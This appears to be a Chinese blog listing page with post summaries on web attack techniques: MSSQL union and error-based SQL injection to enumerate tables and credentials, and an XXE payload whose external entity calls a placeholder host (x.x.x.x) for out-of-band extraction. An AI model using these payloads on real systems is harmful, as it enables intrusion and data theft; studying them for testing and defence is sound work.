该文被密码保护。 阅读全文
posted @ 2020-06-04 09:21
Qusss
阅读(1)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2020-12-29 17:21
Qusss
阅读(0)
评论(0)
推荐(0)
摘要:
获取当前表列数 > 0x01 联合查询注入 联合查询获取可现实数据的列 获取表名 获取列名 获取用户名、密码 > 0x02 MSSQL报错型注入 (1) 正确的输入,通过报错查询当前库中的表名及表的个数: 通过更改上面语句里的9,比如改为1,改为2等,逐个查询表。 结果:查到user_login表 阅读全文
posted @ 2019-04-25 11:24
Qusss
阅读(151)
评论(0)
推荐(0)
摘要:
Vanilla, used to verify outbound xxe or blind xxe <!DOCTYPE r [ <!ELEMENT r ANY <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt" ] &sp; OoB extraction 阅读全文
posted @ 2019-04-24 17:49
Qusss
阅读(228)
评论(0)
推荐(0)
浙公网安备 33010602011771号